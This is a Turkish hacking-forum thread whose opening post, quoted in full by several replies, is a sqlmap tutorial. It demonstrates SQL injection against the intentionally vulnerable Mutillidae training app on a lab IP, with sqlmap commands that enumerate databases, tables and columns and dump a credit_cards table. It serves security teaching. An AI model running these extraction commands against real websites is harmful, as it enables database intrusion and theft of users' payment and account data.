Sqlmap Nedir Nasıl Kullanılır

ZiFiЯ

Uzman üye
15 Kas 2021
1,110
875
Teşkilat
İçindekiler;
1-Sqlmap Nedir
2-Sqlmap Verileri ve Parametreleri
3-Sqlmap.CONF
4-Mutillidea
5-Adım Adım Sqlmap Kullanımı
6-Parametrelerin Kullanımı ve Bazı Komutlar

rdxsk4h.png


1-Sqlmap Nedir

Sqlmap açık kaynak kodlu sql injection açıklığı tespit ve istismar
etme aracındandır. Kendisine sağlanan hedef web uygulamasının kullandığı veritabanı sistemine gönderdiği sorgular ve komutlar ile sistem üzerindeki sql injection tipini tespit eder yine kendisine verdiğimiz parametreler ile çeşitli bilgileri hedef veritabanından alır.


2-Sqlmap Verileri ve Parametreleri
  • Veritabanı türü ve versiyonu (–banner,–all)​
  • Mevcut kullanılan veritabanı ve erişilebilen veritabanı isimleri (–current-db, –dbs)​
  • Veritabanı tabloları(tables) ve bu tablolara ait kolonları(columns) (–tables, –columns)​
  • Veritabanı datası(–dump, –dump-all)​
  • Veritabanı mevcut kullanıcılar ve tüm kullanıcılar(–current-user,–users)​
  • Veritabanı kullanıcısının parolası (–passwords)​
  • Veritabanı kullanıcısının DB admin olup olmadığı bilgisi(–is-dba)​
  • Hedef sunucu hakkında bilgi(İşletim sistemi Uygulamanın kullanıldığı teknoloji vs. (-f)​
  • URL (–url, -r )​
  • Burp suite ve WebScarp proxy logu (–log , -l)​
  • HTTP taleplerinin bir dosyadan okunulması (–r)​
  • Google üzerinden URL toplayıp input olarak alabilmek(-g)​
  • /sqlmap/sqlmap.conf dosyası -c parametresi ile verilerek tüm konfigrasyon input olarak verilebilir. (-c)​

4amox6l.png


3-sqlmap.conf

Sqlmap.conf dosyası oldukça ileri düzey parameterlere sahipYukarıda gösterdiğim parametreler bu conf dosyasına girilerek buradan okunması sağlanılacağı gibi, çeşitli farklı işlemlerde (WAF/IPS/IDS keşfi yapıp/yapmama uzak sunucuda okunacak dosya, uzak sunucuda yürütülecek komut vs. )yapılailmektedir

4-Mutillidea
Mutillidea uygulamasında database table ve column isimlerine daha sonrasında ise kullanıcı bilgilerini ve database versiyonu gibi bilgilere ulaşmamızı sağlar Bu bilgilere ulaşıldıktan sonra sorgular yazarız ve daha sonra Sqlmap ile uzun ve karmaşık komutlar yazmak yerine bu araca gerekli parametreleri vererek istediğimiz sonuçlara ulaşırız

Nasıl mı ? Hadi başlayalım;

Öncelikle Mutillidae uygulamasına Browser üzerinden girişimizi yapıyoruz.

g6sr1yp.png


Resimde görmüş olduğumuz OWASP Top 10 -> A1- Injection -> SQLi-Extract Data -> User Info tabına gidiyoruz. Sonrasında karşımıza çıkan login ekranından giriş yapmaya çalışıyoruz.

fmpcxvi.png


Giriş yapmaya çalıştığımızda hata veriyor ve resmi dikkatli incelediğimizde URL kısmında giriş yapmaya çalıştığımız kullanıcımıza ait bilgilerin var olduğunu görüyoruz Aslında bizimde tam olarak ihtiyacımız olan bu URL ‘di artık Sqlmap yardımıyla ne tür sql injection zaafiyetleri içerdiğini görebileceğiz.

İlk olarak terminalimiz açıyoruz ve aşağıdaki komutu çalıştırıyoruz,

Kod:
sqlmap

9vvzbrs.png


Komutu çalıştırdıktan sonra mutillidea uygulamasında aldığımız hatada oluşan URL ‘li kopyalıyoruz ve komut satırında aşağıdaki şekilde yapıştırıyoruz.

Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details"

Sonrasında bize username alanı ile igili açığı olduğunu söylüyor

f6j17sj.png


Daha sonra Database isimlerine ulaşmak için aşağıdaki komutu çalıştırıyoruz

Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details" --dbs

r0w6d9d.png


Artık Database isimlerine erişmi olduk
Şimdi sırada güncel veritabanına ulaşmak var;)

Kullanımda olan güncel veritabanına ulaşmak için
Aşağıdaki komutu çalıştırıyoruz

Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details" --current-db

kaszv2d.png


Şuan kullanmış olduğu güncel veritabanına
Yukardaki komut ile erişmiş olduk

Sırada veritabanı tablolarına erişmek var
Mevcut kullanımda olan veritabanı tablo isimlerine erişmek için
komutumuzu Aşağıdaki gibi güncelledik.


Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details" --tables -D owasp10

tw7etji.png


Resimde gördüğünüz gibi “owasp10” veritabanına ait tablo isimlerini elde etmiş olduk.

Şimdi ise sırada column isimlerine ulaşmak var.

Aşağıdaki komut yardımı ile column isimlerine ulaşırız.

Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details" --columns -T credit_cards -D owasp10

549qkgo.png


Şimdi kart bilgilerini görelim bakalım;)

Aşağıdaki komut ile ilgili table'nın tüm bilgilerine erişebiliriz.


Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details" -T credit_cards -D owasp10 --dump

twhwwkj.png


Buraya kadar okuduğunuz için
Teşekkürler
Saygı ve Sevgilerimle


Point Prank
 
Son düzenleme:

MuhammedTr768

Kıdemli Üye
7 Kas 2021
2,932
1,815
31
MyKrallife
İçindekiler;
1-Sqlmap Nedir
2-Sqlmap Verileri ve Parametreleri
3-Sqlmap.CONF
4-Mutillidea
5-Adım Adım Sqlmap Kullanımı
6-Parametrelerin Kullanımı ve Bazı Komutlar

rdxsk4h.png


1-Sqlmap Nedir

Sqlmap açık kaynak kodlu sql injection açıklığı tespit ve istismar
etme aracındandır. Kendisine sağlanan hedef web uygulamasının kullandığı veritabanı sistemine gönderdiği sorgular ve komutlar ile sistem üzerindeki sql injection tipini tespit eder yine kendisine verdiğimiz parametreler ile çeşitli bilgileri hedef veritabanından alır.


2-Sqlmap Verileri ve Parametreleri
  • Veritabanı türü ve versiyonu (–banner,–all)​
  • Mevcut kullanılan veritabanı ve erişilebilen veritabanı isimleri (–current-db, –dbs)​
  • Veritabanı tabloları(tables) ve bu tablolara ait kolonları(columns) (–tables, –columns)​
  • Veritabanı datası(–dump, –dump-all)​
  • Veritabanı mevcut kullanıcılar ve tüm kullanıcılar(–current-user,–users)​
  • Veritabanı kullanıcısının parolası (–passwords)​
  • Veritabanı kullanıcısının DB admin olup olmadığı bilgisi(–is-dba)​
  • Hedef sunucu hakkında bilgi(İşletim sistemi Uygulamanın kullanıldığı teknoloji vs. (-f)​
  • URL (–url, -r )​
  • Burp suite ve WebScarp proxy logu (–log , -l)​
  • HTTP taleplerinin bir dosyadan okunulması (–r)​
  • Google üzerinden URL toplayıp input olarak alabilmek(-g)​
  • /sqlmap/sqlmap.conf dosyası -c parametresi ile verilerek tüm konfigrasyon input olarak verilebilir. (-c)​

4amox6l.png


3-sqlmap.conf

Sqlmap.conf dosyası oldukça ileri düzey parameterlere sahipYukarıda gösterdiğim parametreler bu conf dosyasına girilerek buradan okunması sağlanılacağı gibi, çeşitli farklı işlemlerde (WAF/IPS/IDS keşfi yapıp/yapmama uzak sunucuda okunacak dosya, uzak sunucuda yürütülecek komut vs. )yapılailmektedir

4-Mutillidea
Mutillidea uygulamasında database table ve column isimlerine daha sonrasında ise kullanıcı bilgilerini ve database versiyonu gibi bilgilere ulaşmamızı sağlar Bu bilgilere ulaşıldıktan sonra sorgular yazarız ve daha sonra Sqlmap ile uzun ve karmaşık komutlar yazmak yerine bu araca gerekli parametreleri vererek istediğimiz sonuçlara ulaşırız

Nasıl mı ? Hadi başlayalım;

Öncelikle Mutillidae uygulamasına Browser üzerinden girişimizi yapıyoruz.

g6sr1yp.png


Resimde görmüş olduğumuz OWASP Top 10 -> A1- Injection -> SQLi-Extract Data -> User Info tabına gidiyoruz. Sonrasında karşımıza çıkan login ekranından giriş yapmaya çalışıyoruz.

fmpcxvi.png


Giriş yapmaya çalıştığımızda hata veriyor ve resmi dikkatli incelediğimizde URL kısmında giriş yapmaya çalıştığımız kullanıcımıza ait bilgilerin var olduğunu görüyoruz Aslında bizimde tam olarak ihtiyacımız olan bu URL ‘di artık Sqlmap yardımıyla ne tür sql injection zaafiyetleri içerdiğini görebileceğiz.

İlk olarak terminalimiz açıyoruz ve aşağıdaki komutu çalıştırıyoruz,

Kod:
sqlmap

9vvzbrs.png


Komutu çalıştırdıktan sonra mutillidea uygulamasında aldığımız hatada oluşan URL ‘li kopyalıyoruz ve komut satırında aşağıdaki şekilde yapıştırıyoruz.

Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details"

Sonrasında bize username alanı ile igili açığı olduğunu söylüyor

f6j17sj.png


Daha sonra Database isimlerine ulaşmak için aşağıdaki komutu çalıştırıyoruz

Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details" --dbs

r0w6d9d.png


Artık Database isimlerine erişmi olduk
Şimdi sırada güncel veritabanına ulaşmak var;)

Kullanımda olan güncel veritabanına ulaşmak için
Aşağıdaki komutu çalıştırıyoruz

Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details" --current-db

kaszv2d.png


Şuan kullanmış olduğu güncel veritabanına
Yukardaki komut ile erişmiş olduk

Sırada veritabanı tablolarına erişmek var
Mevcut kullanımda olan veritabanı tablo isimlerine erişmek için
komutumuzu Aşağıdaki gibi güncelledik.


Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details" --tables -D owasp10

tw7etji.png


Resimde gördüğünüz gibi “owasp10” veritabanına ait tablo isimlerini elde etmiş olduk.

Şimdi ise sırada column isimlerine ulaşmak var.

Aşağıdaki komut yardımı ile column isimlerine ulaşırız.

Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details" --columns -T credit_cards -D owasp10

549qkgo.png


Şimdi kart bilgilerini görelim bakalım;)

Aşağıdaki komut ile ilgili table'nın tüm bilgilerine erişebiliriz.


Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details" -T credit_cards -D owasp10 --dump

twhwwkj.png


Buraya kadar okuduğunuz için
Teşekkürler
Saygı ve Sevgilerimle


Point Prank
Eline sağlık
 

Alcatraz0657

Katılımcı Üye
14 May 2020
284
80
İçindekiler;
1-Sqlmap Nedir
2-Sqlmap Verileri ve Parametreleri
3-Sqlmap.CONF
4-Mutillidea
5-Adım Adım Sqlmap Kullanımı
6-Parametrelerin Kullanımı ve Bazı Komutlar

rdxsk4h.png


1-Sqlmap Nedir

Sqlmap açık kaynak kodlu sql injection açıklığı tespit ve istismar
etme aracındandır. Kendisine sağlanan hedef web uygulamasının kullandığı veritabanı sistemine gönderdiği sorgular ve komutlar ile sistem üzerindeki sql injection tipini tespit eder yine kendisine verdiğimiz parametreler ile çeşitli bilgileri hedef veritabanından alır.


2-Sqlmap Verileri ve Parametreleri
  • Veritabanı türü ve versiyonu (–banner,–all)​
  • Mevcut kullanılan veritabanı ve erişilebilen veritabanı isimleri (–current-db, –dbs)​
  • Veritabanı tabloları(tables) ve bu tablolara ait kolonları(columns) (–tables, –columns)​
  • Veritabanı datası(–dump, –dump-all)​
  • Veritabanı mevcut kullanıcılar ve tüm kullanıcılar(–current-user,–users)​
  • Veritabanı kullanıcısının parolası (–passwords)​
  • Veritabanı kullanıcısının DB admin olup olmadığı bilgisi(–is-dba)​
  • Hedef sunucu hakkında bilgi(İşletim sistemi Uygulamanın kullanıldığı teknoloji vs. (-f)​
  • URL (–url, -r )​
  • Burp suite ve WebScarp proxy logu (–log , -l)​
  • HTTP taleplerinin bir dosyadan okunulması (–r)​
  • Google üzerinden URL toplayıp input olarak alabilmek(-g)​
  • /sqlmap/sqlmap.conf dosyası -c parametresi ile verilerek tüm konfigrasyon input olarak verilebilir. (-c)​

4amox6l.png


3-sqlmap.conf

Sqlmap.conf dosyası oldukça ileri düzey parameterlere sahipYukarıda gösterdiğim parametreler bu conf dosyasına girilerek buradan okunması sağlanılacağı gibi, çeşitli farklı işlemlerde (WAF/IPS/IDS keşfi yapıp/yapmama uzak sunucuda okunacak dosya, uzak sunucuda yürütülecek komut vs. )yapılailmektedir

4-Mutillidea
Mutillidea uygulamasında database table ve column isimlerine daha sonrasında ise kullanıcı bilgilerini ve database versiyonu gibi bilgilere ulaşmamızı sağlar Bu bilgilere ulaşıldıktan sonra sorgular yazarız ve daha sonra Sqlmap ile uzun ve karmaşık komutlar yazmak yerine bu araca gerekli parametreleri vererek istediğimiz sonuçlara ulaşırız

Nasıl mı ? Hadi başlayalım;

Öncelikle Mutillidae uygulamasına Browser üzerinden girişimizi yapıyoruz.

g6sr1yp.png


Resimde görmüş olduğumuz OWASP Top 10 -> A1- Injection -> SQLi-Extract Data -> User Info tabına gidiyoruz. Sonrasında karşımıza çıkan login ekranından giriş yapmaya çalışıyoruz.

fmpcxvi.png


Giriş yapmaya çalıştığımızda hata veriyor ve resmi dikkatli incelediğimizde URL kısmında giriş yapmaya çalıştığımız kullanıcımıza ait bilgilerin var olduğunu görüyoruz Aslında bizimde tam olarak ihtiyacımız olan bu URL ‘di artık Sqlmap yardımıyla ne tür sql injection zaafiyetleri içerdiğini görebileceğiz.

İlk olarak terminalimiz açıyoruz ve aşağıdaki komutu çalıştırıyoruz,

Kod:
sqlmap

9vvzbrs.png


Komutu çalıştırdıktan sonra mutillidea uygulamasında aldığımız hatada oluşan URL ‘li kopyalıyoruz ve komut satırında aşağıdaki şekilde yapıştırıyoruz.

Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details"

Sonrasında bize username alanı ile igili açığı olduğunu söylüyor

f6j17sj.png


Daha sonra Database isimlerine ulaşmak için aşağıdaki komutu çalıştırıyoruz

Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details" --dbs

r0w6d9d.png


Artık Database isimlerine erişmi olduk
Şimdi sırada güncel veritabanına ulaşmak var;)

Kullanımda olan güncel veritabanına ulaşmak için
Aşağıdaki komutu çalıştırıyoruz

Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details" --current-db

kaszv2d.png


Şuan kullanmış olduğu güncel veritabanına
Yukardaki komut ile erişmiş olduk

Sırada veritabanı tablolarına erişmek var
Mevcut kullanımda olan veritabanı tablo isimlerine erişmek için
komutumuzu Aşağıdaki gibi güncelledik.


Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details" --tables -D owasp10

tw7etji.png


Resimde gördüğünüz gibi “owasp10” veritabanına ait tablo isimlerini elde etmiş olduk.

Şimdi ise sırada column isimlerine ulaşmak var.

Aşağıdaki komut yardımı ile column isimlerine ulaşırız.

Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details" --columns -T credit_cards -D owasp10

549qkgo.png


Şimdi kart bilgilerini görelim bakalım;)

Aşağıdaki komut ile ilgili table'nın tüm bilgilerine erişebiliriz.


Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details" -T credit_cards -D owasp10 --dump

twhwwkj.png


Buraya kadar okuduğunuz için
Teşekkürler
Saygı ve Sevgilerimle


Point Prank
elinize sağlık
 

ZiFiЯ

Uzman üye
15 Kas 2021
1,110
875
Teşkilat
Moderatör tarafında düzenlendi:

Muslukcu

Katılımcı Üye
17 Kas 2021
699
262
Tesisat dükkanı
İçindekiler;
1-Sqlmap Nedir
2-Sqlmap Verileri ve Parametreleri
3-Sqlmap.CONF
4-Mutillidea
5-Adım Adım Sqlmap Kullanımı
6-Parametrelerin Kullanımı ve Bazı Komutlar

rdxsk4h.png


1-Sqlmap Nedir

Sqlmap açık kaynak kodlu sql injection açıklığı tespit ve istismar
etme aracındandır. Kendisine sağlanan hedef web uygulamasının kullandığı veritabanı sistemine gönderdiği sorgular ve komutlar ile sistem üzerindeki sql injection tipini tespit eder yine kendisine verdiğimiz parametreler ile çeşitli bilgileri hedef veritabanından alır.


2-Sqlmap Verileri ve Parametreleri
  • Veritabanı türü ve versiyonu (–banner,–all)​
  • Mevcut kullanılan veritabanı ve erişilebilen veritabanı isimleri (–current-db, –dbs)​
  • Veritabanı tabloları(tables) ve bu tablolara ait kolonları(columns) (–tables, –columns)​
  • Veritabanı datası(–dump, –dump-all)​
  • Veritabanı mevcut kullanıcılar ve tüm kullanıcılar(–current-user,–users)​
  • Veritabanı kullanıcısının parolası (–passwords)​
  • Veritabanı kullanıcısının DB admin olup olmadığı bilgisi(–is-dba)​
  • Hedef sunucu hakkında bilgi(İşletim sistemi Uygulamanın kullanıldığı teknoloji vs. (-f)​
  • URL (–url, -r )​
  • Burp suite ve WebScarp proxy logu (–log , -l)​
  • HTTP taleplerinin bir dosyadan okunulması (–r)​
  • Google üzerinden URL toplayıp input olarak alabilmek(-g)​
  • /sqlmap/sqlmap.conf dosyası -c parametresi ile verilerek tüm konfigrasyon input olarak verilebilir. (-c)​

4amox6l.png


3-sqlmap.conf

Sqlmap.conf dosyası oldukça ileri düzey parameterlere sahipYukarıda gösterdiğim parametreler bu conf dosyasına girilerek buradan okunması sağlanılacağı gibi, çeşitli farklı işlemlerde (WAF/IPS/IDS keşfi yapıp/yapmama uzak sunucuda okunacak dosya, uzak sunucuda yürütülecek komut vs. )yapılailmektedir

4-Mutillidea
Mutillidea uygulamasında database table ve column isimlerine daha sonrasında ise kullanıcı bilgilerini ve database versiyonu gibi bilgilere ulaşmamızı sağlar Bu bilgilere ulaşıldıktan sonra sorgular yazarız ve daha sonra Sqlmap ile uzun ve karmaşık komutlar yazmak yerine bu araca gerekli parametreleri vererek istediğimiz sonuçlara ulaşırız

Nasıl mı ? Hadi başlayalım;

Öncelikle Mutillidae uygulamasına Browser üzerinden girişimizi yapıyoruz.

g6sr1yp.png


Resimde görmüş olduğumuz OWASP Top 10 -> A1- Injection -> SQLi-Extract Data -> User Info tabına gidiyoruz. Sonrasında karşımıza çıkan login ekranından giriş yapmaya çalışıyoruz.

fmpcxvi.png


Giriş yapmaya çalıştığımızda hata veriyor ve resmi dikkatli incelediğimizde URL kısmında giriş yapmaya çalıştığımız kullanıcımıza ait bilgilerin var olduğunu görüyoruz Aslında bizimde tam olarak ihtiyacımız olan bu URL ‘di artık Sqlmap yardımıyla ne tür sql injection zaafiyetleri içerdiğini görebileceğiz.

İlk olarak terminalimiz açıyoruz ve aşağıdaki komutu çalıştırıyoruz,

Kod:
sqlmap

9vvzbrs.png


Komutu çalıştırdıktan sonra mutillidea uygulamasında aldığımız hatada oluşan URL ‘li kopyalıyoruz ve komut satırında aşağıdaki şekilde yapıştırıyoruz.

Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details"

Sonrasında bize username alanı ile igili açığı olduğunu söylüyor

f6j17sj.png


Daha sonra Database isimlerine ulaşmak için aşağıdaki komutu çalıştırıyoruz

Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details" --dbs

r0w6d9d.png


Artık Database isimlerine erişmi olduk
Şimdi sırada güncel veritabanına ulaşmak var;)

Kullanımda olan güncel veritabanına ulaşmak için
Aşağıdaki komutu çalıştırıyoruz

Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details" --current-db

kaszv2d.png


Şuan kullanmış olduğu güncel veritabanına
Yukardaki komut ile erişmiş olduk

Sırada veritabanı tablolarına erişmek var
Mevcut kullanımda olan veritabanı tablo isimlerine erişmek için
komutumuzu Aşağıdaki gibi güncelledik.


Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details" --tables -D owasp10

tw7etji.png


Resimde gördüğünüz gibi “owasp10” veritabanına ait tablo isimlerini elde etmiş olduk.

Şimdi ise sırada column isimlerine ulaşmak var.

Aşağıdaki komut yardımı ile column isimlerine ulaşırız.

Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details" --columns -T credit_cards -D owasp10

549qkgo.png


Şimdi kart bilgilerini görelim bakalım;)

Aşağıdaki komut ile ilgili table'nın tüm bilgilerine erişebiliriz.


Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details" -T credit_cards -D owasp10 --dump

twhwwkj.png


Buraya kadar okuduğunuz için
Teşekkürler
Saygı ve Sevgilerimle


Point Prank
Eline saglik
 

rootibo

Kıdemli Üye
13 Mar 2023
2,168
1,459
İçindekiler;
1-Sqlmap Nedir
2-Sqlmap Verileri ve Parametreleri
3-Sqlmap.CONF
4-Mutillidea
5-Adım Adım Sqlmap Kullanımı
6-Parametrelerin Kullanımı ve Bazı Komutlar

rdxsk4h.png


1-Sqlmap Nedir

Sqlmap açık kaynak kodlu sql injection açıklığı tespit ve istismar
etme aracındandır. Kendisine sağlanan hedef web uygulamasının kullandığı veritabanı sistemine gönderdiği sorgular ve komutlar ile sistem üzerindeki sql injection tipini tespit eder yine kendisine verdiğimiz parametreler ile çeşitli bilgileri hedef veritabanından alır.


2-Sqlmap Verileri ve Parametreleri
  • Veritabanı türü ve versiyonu (–banner,–all)​
  • Mevcut kullanılan veritabanı ve erişilebilen veritabanı isimleri (–current-db, –dbs)​
  • Veritabanı tabloları(tables) ve bu tablolara ait kolonları(columns) (–tables, –columns)​
  • Veritabanı datası(–dump, –dump-all)​
  • Veritabanı mevcut kullanıcılar ve tüm kullanıcılar(–current-user,–users)​
  • Veritabanı kullanıcısının parolası (–passwords)​
  • Veritabanı kullanıcısının DB admin olup olmadığı bilgisi(–is-dba)​
  • Hedef sunucu hakkında bilgi(İşletim sistemi Uygulamanın kullanıldığı teknoloji vs. (-f)​
  • URL (–url, -r )​
  • Burp suite ve WebScarp proxy logu (–log , -l)​
  • HTTP taleplerinin bir dosyadan okunulması (–r)​
  • Google üzerinden URL toplayıp input olarak alabilmek(-g)​
  • /sqlmap/sqlmap.conf dosyası -c parametresi ile verilerek tüm konfigrasyon input olarak verilebilir. (-c)​

4amox6l.png


3-sqlmap.conf

Sqlmap.conf dosyası oldukça ileri düzey parameterlere sahipYukarıda gösterdiğim parametreler bu conf dosyasına girilerek buradan okunması sağlanılacağı gibi, çeşitli farklı işlemlerde (WAF/IPS/IDS keşfi yapıp/yapmama uzak sunucuda okunacak dosya, uzak sunucuda yürütülecek komut vs. )yapılailmektedir

4-Mutillidea
Mutillidea uygulamasında database table ve column isimlerine daha sonrasında ise kullanıcı bilgilerini ve database versiyonu gibi bilgilere ulaşmamızı sağlar Bu bilgilere ulaşıldıktan sonra sorgular yazarız ve daha sonra Sqlmap ile uzun ve karmaşık komutlar yazmak yerine bu araca gerekli parametreleri vererek istediğimiz sonuçlara ulaşırız

Nasıl mı ? Hadi başlayalım;

Öncelikle Mutillidae uygulamasına Browser üzerinden girişimizi yapıyoruz.

g6sr1yp.png


Resimde görmüş olduğumuz OWASP Top 10 -> A1- Injection -> SQLi-Extract Data -> User Info tabına gidiyoruz. Sonrasında karşımıza çıkan login ekranından giriş yapmaya çalışıyoruz.

fmpcxvi.png


Giriş yapmaya çalıştığımızda hata veriyor ve resmi dikkatli incelediğimizde URL kısmında giriş yapmaya çalıştığımız kullanıcımıza ait bilgilerin var olduğunu görüyoruz Aslında bizimde tam olarak ihtiyacımız olan bu URL ‘di artık Sqlmap yardımıyla ne tür sql injection zaafiyetleri içerdiğini görebileceğiz.

İlk olarak terminalimiz açıyoruz ve aşağıdaki komutu çalıştırıyoruz,

Kod:
sqlmap

9vvzbrs.png


Komutu çalıştırdıktan sonra mutillidea uygulamasında aldığımız hatada oluşan URL ‘li kopyalıyoruz ve komut satırında aşağıdaki şekilde yapıştırıyoruz.

Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details"

Sonrasında bize username alanı ile igili açığı olduğunu söylüyor

f6j17sj.png


Daha sonra Database isimlerine ulaşmak için aşağıdaki komutu çalıştırıyoruz

Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details" --dbs

r0w6d9d.png


Artık Database isimlerine erişmi olduk
Şimdi sırada güncel veritabanına ulaşmak var;)

Kullanımda olan güncel veritabanına ulaşmak için
Aşağıdaki komutu çalıştırıyoruz

Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details" --current-db

kaszv2d.png


Şuan kullanmış olduğu güncel veritabanına
Yukardaki komut ile erişmiş olduk

Sırada veritabanı tablolarına erişmek var
Mevcut kullanımda olan veritabanı tablo isimlerine erişmek için
komutumuzu Aşağıdaki gibi güncelledik.


Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details" --tables -D owasp10

tw7etji.png


Resimde gördüğünüz gibi “owasp10” veritabanına ait tablo isimlerini elde etmiş olduk.

Şimdi ise sırada column isimlerine ulaşmak var.

Aşağıdaki komut yardımı ile column isimlerine ulaşırız.

Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details" --columns -T credit_cards -D owasp10

549qkgo.png


Şimdi kart bilgilerini görelim bakalım;)

Aşağıdaki komut ile ilgili table'nın tüm bilgilerine erişebiliriz.


Kod:
sqlmap - u "http://10.0.2.6/mutillidae/index.php?page=user-info.php&username=yakup&password=&user-info-php-submit-button=View+Account+Details" -T credit_cards -D owasp10 --dump

twhwwkj.png


Buraya kadar okuduğunuz için
Teşekkürler
Saygı ve Sevgilerimle


Point Prank
Eline saglik
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.